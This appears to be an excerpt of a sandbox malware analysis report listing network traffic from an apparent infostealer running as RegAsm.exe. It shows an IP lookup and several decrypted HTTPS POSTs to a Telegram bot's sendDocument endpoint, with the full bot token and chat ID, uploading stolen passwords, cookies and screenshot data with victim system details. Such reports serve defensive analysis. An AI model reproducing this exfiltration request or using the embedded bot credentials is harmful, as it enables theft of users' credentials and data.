                                              May 23, 2024 20:27:03.850249052 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:03.850600958 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:03.850617886 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:04.502273083 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:04.504215956 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:04.504241943 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:04.697632074 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:04.697983027 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:04.698005915 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:04.698101044 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:04.698113918 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:04.698276997 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:04.698287964 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:05.419284105 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:05.419385910 CEST44349738149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:05.419413090 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:05.419431925 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:05.420480967 CEST49738443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:24.146977901 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:24.147021055 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:24.147118092 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:24.147444963 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:24.147459030 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:24.774430990 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:24.776748896 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:24.776767015 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.102277040 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.102736950 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:25.102763891 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.102866888 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:25.102880001 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.102943897 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:25.102982998 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.741113901 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.741199017 CEST44349739149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:25.741750956 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:25.741750956 CEST49739443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:30.086982012 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:30.087044001 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:30.091097116 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:30.094978094 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:30.095025063 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:30.867419958 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:30.869785070 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:30.869803905 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.226380110 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.226411104 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.226526022 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.226545095 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.226618052 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.226778984 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.257613897 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.304176092 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.865192890 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.865283012 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.865319014 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.865705967 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.865715027 CEST44349740149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:31.865745068 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:31.865894079 CEST49740443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:35.386759996 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:35.386809111 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:35.386894941 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:35.387485981 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:35.387501955 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.054600954 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.056642056 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:36.056683064 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.405096054 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.405518055 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:36.405555964 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.405632973 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:36.405661106 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.405741930 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:36.405788898 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.893459082 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.893528938 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:36.893548012 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.893568993 CEST44349741149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:36.893614054 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:36.894373894 CEST49741443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:38.305229902 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:38.305269003 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:38.309953928 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:38.313873053 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:38.313885927 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:38.940237045 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:38.942082882 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:38.942120075 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.288918018 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:39.288952112 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.289066076 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:39.289078951 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.289151907 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:39.289217949 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.291450977 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.335427999 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:39.769943953 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.770034075 CEST44349742149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:39.770065069 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:39.770149946 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:39.770936966 CEST49742443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:49.724524021 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:49.724571943 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:49.724661112 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:49.724919081 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:49.724934101 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:50.337738037 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:50.343620062 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:50.343646049 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:50.651931047 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:50.652309895 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:50.652339935 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:50.652432919 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:50.652452946 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:50.652539015 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:50.652570963 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:51.175559044 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:51.175641060 CEST49743443192.168.2.7149.154.167.220
                                              May 23, 2024 20:27:51.175661087 CEST44349743149.154.167.220192.168.2.7
                                              May 23, 2024 20:27:51.175755978 CEST49743443192.168.2.7149.154.167.220

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 23, 2024 20:23:45.025135994 CEST5150053192.168.2.71.1.1.1
                                              May 23, 2024 20:23:45.040985107 CEST53515001.1.1.1192.168.2.7
                                              May 23, 2024 20:23:47.268920898 CEST5306653192.168.2.71.1.1.1
                                              May 23, 2024 20:23:47.280045986 CEST53530661.1.1.1192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              May 23, 2024 20:23:45.025135994 CEST192.168.2.71.1.1.10xcfd8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              May 23, 2024 20:23:47.268920898 CEST192.168.2.71.1.1.10x8481Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              May 23, 2024 20:23:45.040985107 CEST1.1.1.1192.168.2.70xcfd8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              May 23, 2024 20:23:45.040985107 CEST1.1.1.1192.168.2.70xcfd8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              May 23, 2024 20:23:45.040985107 CEST1.1.1.1192.168.2.70xcfd8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              May 23, 2024 20:23:47.280045986 CEST1.1.1.1192.168.2.70x8481No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • api.telegram.org

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.749700172.67.74.1524435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:23:45 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-05-23 18:23:45 UTC211INHTTP/1.1 200 OK
                                              Date: Thu, 23 May 2024 18:23:45 GMT
                                              Content-Type: text/plain
                                              Content-Length: 12
                                              Connection: close
                                              Vary: Origin
                                              CF-Cache-Status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 888714370cf118fa-EWR
                                              2024-05-23 18:23:45 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                              Data Ascii: 8.46.123.175


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.749702149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:23:47 UTC260OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc7b33f5530afb
                                              Host: api.telegram.org
                                              Content-Length: 980
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:23:48 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:23:48 UTC980OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 33 33 66 35 35 33 30 61 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 33 33 66 35 35 33 30 61 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 33 2f 32 30 32 34 20 31 34 3a 32 33 3a 34 36 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc7b33f5530afbContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc7b33f5530afbContent-Disposition: form-data; name="caption"New PW Recovered!Time: 05/23/2024 14:23:46User
                                              2024-05-23 18:23:48 UTC1126INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:23:48 GMT
                                              Content-Type: application/json
                                              Content-Length: 738
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":253,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488628,"document":{"file_name":"user-715575 2024-05-23 14-23-46.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAP9Zk-JtGVNGUQyN-Mr3p0TgvcbI48AArMTAALx64FSDeirjTiWIm01BA","file_unique_id":"AgADsxMAAvHrgVI","file_size":351},"caption":"New PW Recovered!\n\nTime: 05/23/2024 14:23:46\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.175","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.749705149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:23:49 UTC236OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc7b434f66dbb2
                                              Host: api.telegram.org
                                              Content-Length: 918
                                              Expect: 100-continue
                                              2024-05-23 18:23:49 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:23:49 UTC918OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 34 33 34 66 36 36 64 62 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 34 33 34 66 36 36 64 62 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 33 2f 32 30 32 34 20 31 36 3a 30 33 3a 34 31 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc7b434f66dbb2Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc7b434f66dbb2Content-Disposition: form-data; name="caption"New CO Recovered!Time: 05/23/2024 16:03:41User
                                              2024-05-23 18:23:49 UTC1126INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:23:49 GMT
                                              Content-Type: application/json
                                              Content-Length: 738
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":254,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488629,"document":{"file_name":"user-715575 2024-05-23 16-13-40.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAP-Zk-Jtd9wVzYMcly6zMEV4jMzd8wAArQTAALx64FSkjWxyvlKoq41BA","file_unique_id":"AgADtBMAAvHrgVI","file_size":289},"caption":"New CO Recovered!\n\nTime: 05/23/2024 16:03:41\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.175","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.749720149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:31 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc89d04dab1cae
                                              Host: api.telegram.org
                                              Content-Length: 66933
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:25:31 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:31 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 39 64 30 34 64 61 62 31 63 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 39 64 30 34 64 61 62 31 63 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 31 31 2f 32 30 32 34 20 30 34 3a 32 38 3a 30 36 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc89d04dab1caeContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc89d04dab1caeContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/11/2024 04:28:06User
                                              2024-05-23 18:25:31 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:31 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:31 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:31 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:31 UTC1347OUTData Raw: af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da b2 28 a4 06 9c ba e5 f4 f3 c3 3d c4 9e 7c d1 5b 49 6d e6 4a 59 99 95 c3 82 49 27 92 04 87 1f 41 59 94 51 40 05 14 51 40 05 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 ae 46 8a 49 2e 75 3e ab 60 7a c5 c7 a3 3b 29 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a cf d6 7c 4a ba 8e 90 ba 72 5b 32 aa b8 71 23 37 27 19 ed 8f 7f 5a e7 68 ac e3 46 11 8a 82 5a 27 7e bb 94 e6 dc b9 ba da c1 45 14 56 a4 85 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 b0 68 a9 94 54 95 99 13 82 9a b3 3d 33 4d d4 ee ee 5b 6b de 6d 81 06 5e 43 b4 1c 7a 6e eb fa d6 57 8a bc 4f 04 96 af 61 61 20 90 c8 31 24 8b d0 0f 41 eb 5c 45 15 c8 f0 6a 75 55 4a 8e f6 d9 1b 52 9b a5 4d c1 75 ea 14 51 45 77 10
                                              Data Ascii: s}rYo".Np<(=|[ImJYI'AYQ@Q@ux+Im?-pl,tFI.u>`z;)myM c`:|Jr[2q#7'ZhFZ'~EVoiZc/hT=3M[km^CznWOaa 1$A\EjuUJRMuQEw
                                              2024-05-23 18:25:31 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 39 64 30 34 64 61 62 31 63 61 65 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc89d04dab1cae--
                                              2024-05-23 18:25:32 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:32 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
